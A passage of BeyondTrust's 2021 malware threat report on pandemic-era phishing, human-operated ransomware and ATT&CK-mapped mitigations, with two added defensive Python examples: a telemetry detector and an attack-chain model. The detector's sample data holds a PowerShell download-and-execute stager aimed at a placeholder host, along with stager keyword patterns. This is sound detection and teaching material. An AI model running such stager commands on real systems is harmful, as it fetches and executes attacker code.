Malware Threat Report 2021
BeyondTrust Labs Analysis of Ransomware and Phishing Trends & How to Mitigate Them
James Maude
Lead Cybersecurity Researcher
BeyondTrust
TABLE OF CONTENTS
Executive Summary ... 3
Security Challenges of 2020-2021 ... 4
  The Increased Attack Surface - Bringing Threats Home ... 4
  The New Perimeter ... 7
  More Privileges, More Problems ... 9
  Privileged Application Vulnerabilities ... 11
  Summary of Security Challenges ... 13
Maturity of the Malware Ecosystem ... 14
  Human-Operated Ransomware ... 16
BeyondTrust Malware Labs - Analysis of Malware Threats ... 21
  Overview of Malware Strains ... 22
  Common Denominators ... 27
  Most Common Techniques After Initial Malware Execution ... 29
  Lab-Testing BeyondTrust Trusted Application Protection Against Top Malware Strains ... 31
Diving Into MITRE ATT&CK Framework Definitions & Mitigations ... 34
  T1047 Windows Management Instrumentation (WMI) ... 35
  T1204.002 User Execution: Malicious File ... 36
  T1059.001 PowerShell used for initial execution ... 37
  T1059.003 Windows Command Shell (CMD) ... 38
  Other Techniques ... 39
The 5 Critical Steps to Complete Endpoint Security ... 40
Additional Resources ... 43
Appendix: Threat Samples Tested ... 44
Note: The lab-based research in this report pertains only to Windows desktops and servers.
Executive Summary
This research report provides insights and analysis into threats and privileged account misuse on Windows devices across the globe. This research is from the same BeyondTrust Labs team that publishes the annual Microsoft Vulnerabilities Report.
This report is based on real-world monitoring and analysis of attacks between Q1 2020 and Q1 2021 discovered in the wild by the BeyondTrust Labs team, with collaboration from customers and incident response teams using BeyondTrust's products. In addition to general insights into the threat landscape, the report also dives into recurring threat themes and maps out Tactics, Techniques, and Procedures (TTPs) against the MITRE ATT&CK Enterprise Framework.
BeyondTrust Labs explored the 58 techniques the MITRE ATT&CK Framework lists for Cobalt Strike (threat emulation software): 66% of the techniques either recommend Privileged Account Management, User Account Management, or Application Control as mitigations, or list Administrator/SYSTEM accounts as a prerequisite for the technique to succeed. Therefore, the control of privileges and application execution is a key defensive measure in mitigating Cobalt Strike and tools/malware with similar capabilities, because it reduces the attack surface and denies code execution and privileged rights.
KEY FINDINGS
1. Absent the right protection, malware will disable endpoint security controls and undermine your security investment.
2. We are observing a growing trend in the use of native tools to perform fileless attacks in the initial stages, until a strong foothold and persistence mechanism is established and security controls have been disabled.
3. The MITRE ATT&CK Framework provides an effective way to distill a wide range of malware strains and cyberattacks into component techniques, which can then be mitigated.
4. BeyondTrust's out-of-the-box policies proactively disrupted all 150 different, common attack chains tested in our analysis.
5. Removal of admin rights and implementation of pragmatic application control are two of the most effective security controls for preventing and mitigating the most common malware threats.
Security Challenges of 2020-2021
The Increased Attack Surface: Bringing Threats Home
Security staples such as network monitoring and firewall technologies are becoming less effective as the perimeter shifts from the corporate office to the home office, or "work from anywhere" for that matter.
Over the past two decades, organizations invested significantly in shoring up their cyber defenses. Some of these investments have been rendered far less effective, even obsolete, due to the changes ushered in by the pandemic.
Email fatigue is greater than ever. The daily communications that once happened in person, or over the office phone, have shifted increasingly to emails, online meetings, and other communication tools. This means that users are not only seeing higher volumes of emails, but also receiving emails from a wider range of sources, such as:
- Colleagues they have never met
- Prospective suppliers
- New clients
- Other departments about policies, tools, and information needed to support home working
Despite the rise of modern collaboration software, most office communication still revolves heavily around sending and receiving emails with documents, links, or other attachments. For example, an HR team expects to receive resumes, and a finance department expects invoices or contracts.
The expectation of receiving legitimate communications via email, often from sources unknown or unanticipated, makes it easy for an attacker to tailor an email phishing campaign and achieve a high success rate. Departments with access to the most documents and data are often the most likely to fall victim to phishing efforts, subsequently leading to a ransomware or other malware attack.
Figure 1: Example of a COVID-19 themed phishing email linking to a malicious Word document
Consequently, threat actors launched highly successful campaigns that use targeted phishing emails to socially engineer the overwhelmed remote worker into entering their credentials or opening an infected document.
> In BeyondTrust Labs, we observed a 200% increase in phishing emails, with the majority being COVID-19 themed.
The threat actors sending emails impersonated a variety of government and non-government organizations, from the World Health Organization (WHO) and the Centers for Disease Control and Prevention (CDC) to government departments and pharmaceutical companies.
These email campaigns prompted the Department of Homeland Security (DHS), the Cybersecurity & Infrastructure Security Agency (CISA), and the World Health Organization (WHO) to issue communications warning users of the risks. The United Kingdom National Cyber Security Centre also launched a campaign to be "Cyber Aware" following the takedown of 2,000 scams, including 471 fake online shops for COVID-19 related services.
WHO Communication Warning Users of Phishing Techniques
The World Health Organization will:
- Never ask for your username and password to access safety information
- Never email attachments you didn't ask for
- Never charge money to apply for a job, register for a conference, or reserve a hotel
- Never conduct lotteries or offer prizes, grants, certificates or funding through email
The New Perimeter
> "Just like the ice wall in Game of Thrones, organizations spent years building a technological perimeter wall to keep threats out. Despite cries that 'the perimeter is dead,' they have continued to place a lot of faith (and investment) in it. The rapid transition to remote working, and the sudden dissolution of the perimeter, has forced an abrupt shift to focus on securing identities and end-user devices. IT departments are under pressure to upgrade capacities fast and this results in changing or replacing existing systems with little time to do thorough security tests. Vulnerabilities in the remote access infrastructure and access protocols may remain undetected and can be exploited in cyberattacks."
International Monetary Fund: Cybersecurity of Remote Work During the Pandemic
To adapt to social distancing initiatives or work from home policies, businesses were forced to accept unprecedented risks that would have been inconceivable a few months prior, just to continue operating and keep users productive.
In some cases, old desktop machines that no one ever imagined leaving the corporate network were being loaded into cars and taken home to potentially vulnerable networks that they were never intended to join.
A wide range of remote access tools and cloud services were hastily spun up, sometimes overnight or over a long, sleepless weekend.
In many cases, due to the speed of the deployments, users were all given broad access to data and systems as business erred on the side of freedom and flexibility to ensure that users were able to work remotely.
Attackers overwhelmingly seek out the easy targets that will yield a fast payday. Thus, cybercriminals quickly capitalized on this sudden shift, rapidly identifying that not only had the attack surface vastly increased, but so had the access to data and systems. One of the outcomes of these factors was reflected in the surge of successful ransomware campaigns, as attackers were able to land and expand with newfound ease. Since the pandemic, there have been a third more ransomware families and 560,000 new pieces of malware detected every day (DataProt, 2021).
> BeyondTrust Labs has also witnessed an increase in specialist Ransomware-as-a-Service (RaaS) operators, which not only provide services that lower the technical barriers for would-be cyber-criminals but are also far more capable of taking down large enterprises.
In this environment, it's hardly surprising that multimillion dollar ransoms are now commonplace. These ransoms are not just quick cash payouts, but seed rounds for the ransomware operators, who continue to invest in better infrastructure and in leveraging zero-day exploits.
Many organizations who previously had robust monitoring in place on the internal network, helping to identify malware traffic and lateral movement, have been blind to the new and evolving attack techniques. This is because so many endpoints now operate partially or fully outside of the network. To compound this problem, there was a nearly 900% surge in fileless malware attacks (Internet Security Report for Q4 2020, WatchGuard Technologies), which often involve attackers exploiting native applications, like PowerShell, to perform tasks. This reduces the chance of detection, as many solutions are looking for new applications appearing rather than existing, legitimate tools launching.
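The detection side of the problem described above, as an added example (this is illustration code written for this edit, not BeyondTrust's or any vendor's code): a small Python detector that reads process-creation telemetry and flags native script hosts launched by document handlers or mail clients, PowerShell started with stager-style switches or an encoded command, and WMI used to start a process. The "Key=Value|Key=Value" line format, the field names and the five sample events are constructed for the example to resemble Sysmon Event ID 1 fields; the technique IDs are the ATT&CK IDs this report discusses.

```python
"""Flag native-tool ("living off the land") execution in process-creation
telemetry. Added example for this report, not BeyondTrust code.
The 'Key=Value|Key=Value' event format, the field names and the sample events
below are constructed to resemble Sysmon Event ID 1 fields (an assumption)."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Parents that should not normally spawn shells or script hosts. A child
# started by one of these is ATT&CK T1204.002 (User Execution: Malicious File).
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "powerpnt.exe",
                     "outlook.exe", "acrord32.exe"}

# Native tools the report calls out, with the technique each one exercises.
LOLBIN_TECHNIQUES = {
    "powershell.exe": "T1059.001",
    "pwsh.exe": "T1059.001",
    "cmd.exe": "T1059.003",
    "wmic.exe": "T1047",
}

# Command-line fragments typical of download-and-execute PowerShell stagers.
SUSPICIOUS_PS_TOKENS = ("invoke-expression", "iex", "downloadstring",
                        "frombase64string", "-nop", "-w hidden")


@dataclass
class Finding:
    record_id: int
    techniques: List[str] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Split 'Key=Value|Key=Value' into a dict (constructed telemetry format)."""
    return dict(part.split("=", 1) for part in line.strip().split("|"))


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none.
    PowerShell expects the argument as base64 of the UTF-16LE script text."""
    m = re.search(r"(?i)(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]{16,})",
                  cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events: List[str]) -> List[Finding]:
    """Run the three rules over every event and return only the events that fire."""
    findings = []
    for line in events:
        ev = parse_event(line)
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        cmdline = ev.get("CommandLine", "")
        f = Finding(record_id=int(ev["RecordId"]))

        # Rule 1: document handler or mail client spawning a native tool.
        if child in LOLBIN_TECHNIQUES and parent in DOCUMENT_HANDLERS:
            f.techniques += ["T1204.002", LOLBIN_TECHNIQUES[child]]
            f.reasons.append(f"{parent} spawned {child}")

        # Rule 2: PowerShell stager traits, looking inside any encoded command.
        if child in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmdline)
            haystack = (cmdline + " " + (decoded or "")).lower()
            hits = [t for t in SUSPICIOUS_PS_TOKENS if t in haystack]
            if decoded is not None:
                hits.append("encoded command")
            if hits:
                if "T1059.001" not in f.techniques:
                    f.techniques.append("T1059.001")
                f.reasons.append("PowerShell stager traits: " + ", ".join(hits))

        # Rule 3: WMI used to start a process (T1047), whoever the parent is.
        if child == "wmic.exe" and "process call create" in cmdline.lower():
            f.techniques.append("T1047")
            f.reasons.append("wmic process call create")

        if f.techniques:
            findings.append(f)
    return findings


# Constructed sample telemetry (not real captures). The encoded payload is a
# typical download-and-execute one-liner, built here the way an attacker would.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    "RecordId=1|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    f"|CommandLine=powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}",
    "RecordId=2|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|Image=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=cmd.exe /c wmic process call create calc.exe",
    "RecordId=3|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|Image=C:\\Windows\\System32\\wbem\\WMIC.exe"
    "|CommandLine=wmic process call create calc.exe",
    "RecordId=4|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -Command Get-ChildItem C:\\Users",
    "RecordId=5|ParentImage=C:\\Windows\\System32\\services.exe"
    "|Image=C:\\Windows\\System32\\svchost.exe|CommandLine=svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    for hit in analyze(SAMPLE_EVENTS):
        print(f"record {hit.record_id}: {', '.join(hit.techniques)} <- {'; '.join(hit.reasons)}")
```

The point of the parent/child rule is the one the paragraph makes: the tool that launches is legitimate and already on disk, so the signal is who launched it and how, not a new binary appearing. Decoding -EncodedCommand before matching matters because the stager strings are otherwise invisible on the command line.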
More Privileges, More Problems
Over the past few years, most organizations have been advancing toward a least privilege approach, where users are only allocated the privileges/privileged access they need to do their role. In many industries, this is now mandatory (NIST, PCI, HIPAA, etc.). Due to the effectiveness of this security control, it is expected that companies in other industries will follow.
Supporting the newly remote workforce presented organizations with many challenges around privileged access. For instance, seemingly trivial tasks, like installing printer drivers for the device in the home office, or the software needed for a new wireless headset, or updating the local time on a laptop, required local admin rights that users didn't have. To continue functioning without overwhelming support desks with calls and tickets, many organizations gave users access to local admin rights on a temporary or permanent basis, vastly increasing the security risk.
The International Monetary Fund (IMF) addressed this topic in a special series of notes warning of the potential cybersecurity risks brought about by remote working during the pandemic. This increased pervasiveness of local admin rights has made it significantly easier for common malware strains to use simple Elevation of Privilege (EoP) techniques to not only gain access to privileges on the system, but also use these privileges to disable or bypass existing security controls.
Thus, it's critical to remove local admin rights and apply more granularity around privileged access security controls.
> "We were up against the clock on this one and ended up issuing work from home laptops with local admin rights for the old desktop user groups. We also had to react to an influx of support calls by granting temporary admin privileges to our existing laptop user groups. This was all because we didn't have a solution in place at the time. Privilege Management has quickly become our top priority."
Head of IT Ops, Engineering Firm
> "Employees should not have administration rights on firm-owned notebooks, security hardened configurations and up-to-date endpoint security solutions should be in place, connection security parameters should be set according to good practices and should be locked, and the corporate remote access infrastructure should be tightly controlled."
International Monetary Fund: Cybersecurity of Remote Work During the Pandemic
Privileged Application Vulnerabilities
Alongside the increase in users with admin rights, we have observed a rising trend in software that does not properly manage privileges.
The 2021 edition of the BeyondTrust Labs annual Microsoft Vulnerabilities Report found the following:
- Elevation of Privilege (EoP) vulnerabilities increased 3x from 2019 to 2020
- These accounted for 44% of the 1,268 critical Microsoft vulnerabilities surveyed in 2020
- Remote Code Execution (RCE) was the next highest category (27% of the critical vulnerabilities)
The issue of improper privilege management has been highlighted by MITRE, who included CWE-269 (Improper Privilege Management) in their "2020 CWE Top 25 Most Dangerous Software Weaknesses."
3X INCREASE: EoP vulnerabilities year over year, 2019-2020
44%: share of the critical Microsoft vulnerabilities in 2020 that were EoP
CWE-269: Improper Privilege Management. "The software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor." Source: MITRE CWE
As shown in the chart below, this weakness has been trending upwards almost exponentially since 2016. Thus, it is more important than ever to control the privileges granted, not only at the user level, but at the application level, to prevent that sphere of control being created for a threat actor.
[Chart: Vulnerability Type Change by Year]
However, the issues of improper privilege management are not just a Windows problem, as the data shown above tracks common weaknesses against a variety of software and operating systems. While it is not always possible to control how the software itself handles privileges, the principle of least privilege (POLP) can be directly applied to the application to control risk.
From restricted tokens, to controlling child process inheritance, there are a variety of ways a robust endpoint privilege management solution can mitigate the risk of improper privilege management by applications.
Figure 2: CWE-269 Improper Privilege Management has been vastly increasing since 2016. Source: NIST. This visualization is a slightly different view that emphasizes how the assignment of CWEs has changed from year to year.
Summary of Security Challenges
In 2020, the attack surface expanded massively due to:
- The expansion in use cases for granting access to privileges
- An increase in software with dangerous vulnerabilities
- The widespread use of remote access that resulted from a massive shift to remote working
Attackers shrewdly exploited these new cyber exposures, often using elevation of privilege attacks and sophisticated malware campaigns, frequently playing on the emotions and fears of users.
Threat actors work ceaselessly to evolve their operations and have matured significantly over the past year. In our next section, we will explore the continuing evolution of the cybercrime industry.
Maturity of the Malware Ecosystem
> Parallel to legitimate software companies and the trend towards SaaS, threat actors are shifting to Malware-as-a-Service (MaaS) models, with specialists emerging in different areas, including enterprise credential sales, initial access to a target organization, lateral movement capability, or payload delivery.
As with any growth industry, we have seen a lot of changes in malware ecosystems and their economic models. Today, there are often many different pieces of malware that come together in an attack. A modern ransomware attack could be comprised of multiple threat actors, tools, and platforms.
For example:
- Threat actors rent the Necurs botnet and use it to distribute malicious spam
- Spam contains malicious documents that launch Trickbot
- Trickbot is used to harvest credentials, access emails, and for lateral movement across the network
- With widespread compromise of the target network, the threat actor sells backdoor access to the network to the highest bidder
- The buyer then deploys Ryuk ransomware via the Trickbot command and control servers
In this chain of events, we can see several malware players and their tools within their own specialties. This modular approach allows the malware authors to focus on excellence in one area.
This specialization not only drives innovation through competition, but also reduces the threat actor's risk. If one part of the chain is taken down, the other parts can quickly shift to another supplier.
Alternatively, if you're a threat actor looking to avoid being blocked by antivirus (AV) tools, then you can just buy access to systems where Trickbot has already breached the network and disabled the AV software.
This approach makes modern malware considerably more resilient to takedown attempts, while also setting the technical bar for illicit entry much lower. After all, an attacker no longer has to be an accomplished developer, social engineer, or skilled hacker. They can now buy, rather than build, tools and use the MaaS platforms to orchestrate sophisticated malware campaigns.
Human-Operated Ransomware
As threat actors seek to maximize the disruption to organizations and extract the highest ransom payments, the ransomware model is shifting towards human-driven, enterprise-wide attacks.
Rather than create an automated worm that self-propagates across the network, the latest generation of ransomware-as-a-service (RaaS) will tread lightly, establishing a foothold in the network of a large organization. Using common penetration testing tools, such as Cobalt Strike or PowerShell Empire, they then survey the network and spread, using privilege escalations to gain control of critical systems and disable security controls, before finally encrypting key systems and exfiltrating data.
> "Human-operated ransomware campaigns pose a significant and growing threat to businesses and represent one of the most impactful trends in cyberattacks today. In these hands-on-keyboard attacks, which are different from auto-spreading ransomware like WannaCry or NotPetya, adversaries employ credential theft and lateral movement methods traditionally associated with targeted attacks like those from nation-state actors."
Human-operated Ransomware Attacks: A Preventable Disaster
The Evolution of Ransomware
Figure 3: How ransomware has evolved as it seeks out more critical data and systems as higher value targets
Timeline: Archievus (2005), Reveton (2012), Cryptolocker (2013), WannaCry (2017), REvil (2019), DarkSide (2021)
- Basic Ransomware: Automated, single endpoint
- Business Ransomware: Automated, single endpoint
- Enterprise Ransomware: Automated, multiple endpoints
- Tailored Ransomware: Manually orchestrated
2005, Individual Targeting: Archievus uses asymmetric encryption to encrypt files in the "Documents" folder, forcing the user to buy decryption through website purchases.
2013, Business Targeting: Cryptolocker starts using professional emails to target businesses. Ransoms data on a single endpoint.
2017, Enterprise Worm: WannaCry exploits CVE-2017-0145 to propagate across networks. Ransoms data across the entire network.
2019, Tailored Operations: Maximizing business disruption and pressure to pay a ransom, attacks become more tailored and less automated. Humans using pen-testing tools search the network for targets.
Over the past 15 years, ransomware attacks have shifted from targeting a few file types in a single folder on one endpoint, to widespread encryption of entire networks of systems. While taking down a big network and many systems can result in a more devastating attack and greater business impact, it also lengthens the attack chain, providing more opportunities to detect and prevent the attack.
From a defensive point of view, this latest evolution of ransomware makes it far more difficult to identify attacks by using traditional detection tools, as they are less likely to use a generic payload. Instead, human-operated ransomware attacks involve a real person using professional tools.
This hands-on approach can wage a highly tailored attack on the target that frequently involves obfuscating code and leveraging fileless techniques to maintain a light footprint and to avoid triggering alarm bells while they explore the systems.
Fileless techniques may exploit native applications like PowerShell or .NET developer tools to run scripts and launch payloads, avoiding introducing new applications to disk that may be detected or blocked.
Figure 4: Example of a human-operated ransomware campaign observed in the wild

Human Operated Attack Chain

Stage                               | Attack Chain Phase          | MITRE ATT&CK technique(s)                                             | Example
Access Environment                  | Initial Access              | T1566 Phishing                                                        | Trickbot via phishing email
Access Environment                  | Execution & Local Elevation | T1548.002 UAC Bypass                                                  | Cobalt Strike or PowerShell Empire
Persist, Recon, Traverse and Spread | Credential Access           | T1134 Access Token Manipulation; T1003 & T1003.001 Credential Dumping | Using LaZagne, Mimikatz or other tools
Persist, Recon, Traverse and Spread | Privilege Escalation        | T1055 Process Injection                                               | Control over valid admin accounts
Persist, Recon, Traverse and Spread | Persistence                 | T1053 Scheduled Task/Job; T1078 Valid Accounts: Domain Accounts       | New Domain Admin (DA) accounts
Persist, Recon, Traverse and Spread | Discovery                   | T1087 Account Discovery; T1033 System Owner/User Discovery            | Recon and enumeration using BloodHound
Persist, Recon, Traverse and Spread | Lateral Movement            | T1035 Service Execution (now T1569.002 System Services: Service Execution) | PsExec or other tools
Persist, Recon, Traverse and Spread | Defense Evasion             | T1562 Impair Defenses                                                 | Tampering with A/V & security services
Execute Objective                   | Impact                      | T1486 Data Encrypted for Impact                                       | Invoke Ryuk ransomware payload

The Role of Privilege Management for Windows at each stage:
- Access Environment: prevents PowerShell from being launched from a phishing attachment
- Persist, Recon, Traverse and Spread: prevents access to local admin rights, mitigating credential access, privilege escalation and defense evasion
- Execute Objective: prevents the malware payload executing
As shown in the attack chain chart on the previous page, there are many stages in a human-operated ransomware campaign as the attacker seeks deeper access and control of the network.
> Starting from the phishing email, the attack will exploit privileges and the ability to execute applications like PowerShell to "land and expand," eventually leading to total compromise of large enterprises.
Professional tools, such as Cobalt Strike, offer an attacker several techniques for executing code, capturing credentials, and moving laterally within a network. Such tools are popular with threat actors. APT29, Wizard Spider, and Chimera are just a few of the threat groups that have been observed using Cobalt Strike as part of their attacks.
MITRE has mapped the functionality of Cobalt Strike and recommends Privileged Account Management (M1026) and Execution Prevention (M1038) as mitigations against a range of the tool's techniques.
In fact, if we take a deeper look at the 58 techniques MITRE lists for Cobalt Strike, 66% of them either recommend using Privileged Account Management, User Account Management, or Application Control as a mitigation, or list Administrator/SYSTEM accounts as being a prerequisite for the technique to succeed. Therefore, the control of privileges and application execution is a key defensive measure in mitigating this specific tool, and ones similar to it, through a reduction in the attack surface and denying code execution and privileged rights.
> "Trickbot, and the Ryuk operators, also take advantage of users running as local administrators in environments and use these permissions to disable security tools that would otherwise impede their actions."
Human-operated Ransomware Attacks: A Preventable Disaster
> While ransomware has clearly evolved, the fundamental needs to execute code and leverage privileges have largely remained consistent. Whether it is the basic ransomware hitting a single endpoint, or a sophisticated, tailored attack, the benefits of proactively reducing the attack surface by removing admin accounts and controlling application execution are universal.
When it comes to human-operated ransomware, one of the attacker's key objectives is to find accounts with local admin rights. Attackers exploit these accounts to disable security controls and steal credentials that allow them to move laterally, deeper and deeper into an environment.
The example attack chain shown in Figure 4 could have been thwarted at an early stage by simply preventing the phishing document from launching PowerShell and eliminating the local admin rights to prevent credential dumping.
We also want to highlight the importance of mitigating credential dumping techniques, as these are often critical steps for an attacker to perform discovery, lateral movement, persistence, and defense evasion. The attacker's goal is to "land and expand"; a simple path to privileged credentials makes this far easier to achieve. When you mitigate the attacker's ability to execute and perform credential dumping, you don't just mitigate those techniques, but also a broad range of other ones that hinge on credential access to succeed.
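To make the dependency argument of the last two paragraphs concrete, here is an added Python example (illustration code written for this edit, not BeyondTrust's or MITRE's code) that models the Figure 4 chain as a graph of steps and shows which steps two preventive controls take away: removing local admin rights, and blocking script hosts spawned from document handlers. The technique IDs and phase descriptions come from Figure 4; the edges between steps, the requires-admin flags and the two control names are assumptions made for the example.

```python
"""Dependency model of the Figure 4 human-operated ransomware chain.
Added example, not BeyondTrust code. Technique IDs and phase names are the
ones printed in Figure 4; the 'needs' edges, the requires_admin flags and
the two control names are assumptions made for this example."""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

REMOVE_LOCAL_ADMIN = "remove_local_admin"              # users run as standard users
BLOCK_DOC_CHILDREN = "block_document_child_processes"  # app control: Office cannot spawn script hosts


@dataclass(frozen=True)
class Step:
    technique: str
    phase: str
    needs: Tuple[str, ...]    # steps that must have succeeded before this one (assumed edges)
    requires_admin: bool      # needs local admin / SYSTEM to succeed (assumption)
    app_control_stops: bool   # denied when documents cannot spawn script hosts


# Listed in dependency order so a single forward pass resolves every step.
CHAIN: List[Step] = [
    Step("T1566", "Initial Access: Trickbot via phishing email", (), False, False),
    Step("T1059.001", "Execution: PowerShell launched from the attachment", ("T1566",), False, True),
    Step("T1548.002", "Local elevation: UAC bypass", ("T1059.001",), True, False),
    Step("T1087", "Discovery: account discovery (BloodHound)", ("T1059.001",), False, False),
    Step("T1033", "Discovery: system owner/user discovery", ("T1059.001",), False, False),
    Step("T1134", "Access token manipulation", ("T1548.002",), True, False),
    Step("T1003.001", "Credential access: LSASS dumping (Mimikatz, LaZagne)", ("T1548.002",), True, False),
    Step("T1055", "Privilege escalation: process injection", ("T1548.002",), True, False),
    Step("T1562", "Defense evasion: tampering with A/V and security services", ("T1548.002",), True, False),
    Step("T1053", "Persistence: scheduled task", ("T1548.002",), True, False),
    Step("T1078", "Persistence: new domain admin accounts", ("T1003.001",), False, False),
    Step("T1035", "Lateral movement: PsExec with stolen credentials", ("T1003.001", "T1087"), False, False),
    Step("T1486", "Impact: Ryuk payload encrypts data", ("T1035", "T1562"), False, False),
]


def simulate(controls: Set[str]) -> Dict[str, str]:
    """Return technique -> 'reached', 'blocked by <control>' or 'unreachable'.

    A step is reached only when every step it needs was reached and no enabled
    control denies it. A step whose prerequisite was denied is 'unreachable'
    even though nothing blocked it directly; that is the knock-on effect the
    report describes for credential dumping."""
    status: Dict[str, str] = {}
    for step in CHAIN:
        if any(status.get(n) != "reached" for n in step.needs):
            status[step.technique] = "unreachable"
        elif step.requires_admin and REMOVE_LOCAL_ADMIN in controls:
            status[step.technique] = f"blocked by {REMOVE_LOCAL_ADMIN}"
        elif step.app_control_stops and BLOCK_DOC_CHILDREN in controls:
            status[step.technique] = f"blocked by {BLOCK_DOC_CHILDREN}"
        else:
            status[step.technique] = "reached"
    return status


def denied_fraction(controls: Set[str]) -> float:
    """Share of the chain's steps the attacker can no longer perform."""
    status = simulate(controls)
    return sum(1 for s in status.values() if s != "reached") / len(status)


if __name__ == "__main__":
    for controls in (set(), {REMOVE_LOCAL_ADMIN}, {BLOCK_DOC_CHILDREN},
                     {REMOVE_LOCAL_ADMIN, BLOCK_DOC_CHILDREN}):
        status = simulate(controls)
        print(f"controls={sorted(controls) or 'none'}: "
              f"{denied_fraction(controls):.0%} of steps denied")
        for step in CHAIN:
            print(f"  {step.technique:<10} {status[step.technique]:<45} {step.phase}")
```

Under the assumed edges, removing local admin rights directly blocks only the UAC bypass, yet nine of the thirteen steps drop out because credential dumping, defense evasion and everything downstream depend on it; blocking the document-to-PowerShell hop leaves only the phishing delivery itself. The numbers are properties of this model, not of the report's 150 tested chains, but the mechanism is the one the text describes.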
BeyondTrust Malware Labs: Analysis of Malware Threats
(May 20